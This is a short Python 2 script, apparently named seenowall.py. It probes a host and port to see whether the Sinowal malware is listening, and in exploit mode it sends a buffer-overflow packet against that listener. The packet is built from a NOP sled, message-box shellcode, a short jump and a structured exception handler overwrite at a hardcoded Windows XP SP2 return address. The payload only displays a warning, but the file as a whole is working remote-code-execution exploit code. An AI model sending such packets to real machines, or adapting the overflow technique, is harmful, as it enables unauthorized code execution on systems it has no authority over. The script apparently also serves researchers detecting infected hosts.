#!/usr/bin/env python

import sys
from socket import *

xpsp2_ret = "\xe5\x38\xC8\x74" # 0x74C838E5 OLEACC
short_jmp = "\xEB\xD3\x90\x90"


detection_packet = "x" * 10
beepshellcode = "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" \
"\x77\x7A\x83\x7C" \
"\xC7\x44\x24\x04" \
"\xD0\x03" \
"\x00\x00\xC7\x04\x24" \
"\x01\x0E" \
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3" 

msg = "infected with sinowal!"

msgboxshellcode = "\x6A\x00\x6A\x00\xE8" + chr(len(msg)+1) + "\x00\x00\x00" + msg + "\x00\x6A\x00\xE8" + "\xAE\x05\x09\x7E"

seh_ret = xpsp2_ret


exploit_packet = "\x20\x20\x2F\x2F\x3A" + \
                 (0x44 - len(msgboxshellcode)) * "\x90" + \
                 msgboxshellcode + \
                 short_jmp + \
                 seh_ret + \
                 "\x2F"


"""
exploit_packet = "\x20\x20\x2F\x2F\x3A" + \
                 0x44 * "\x90" + \
                 short_jmp + \
                 seh_ret + \
                 shellcode + \
                 "\x2F"
"""


if (len(sys.argv) < 4) or ("-e" not in sys.argv and "-d" not in sys.argv):
  print "seenowall.py <ip> <tcp port> <mode>"
  print "modes:\n" \
  "  -d (detect)\n" \
  "  -e (exploit)\n"
  sys.exit(0)

s = socket(AF_INET, SOCK_STREAM)

print "[*] connecting"

try:
  s.connect((sys.argv[1], int(sys.argv[2])))
except:
  print "[!] connection error"
  s.close()
  sys.exit(0)


if "-e" in sys.argv:
  print "[*] sending exploit"
  s.send(exploit_packet)
else:
  print "[*] sending detection packet"
  s.send(detection_packet)
  reply = s.recv(1024)
  if reply != "<h1>ERROR IN REQUEST<br>":
    print "[*] sinowal not listening on this port"
    s.close()
    sys.exit(0)
  print "[*] remote box is infected (and possibly vulnerable)"

s.close()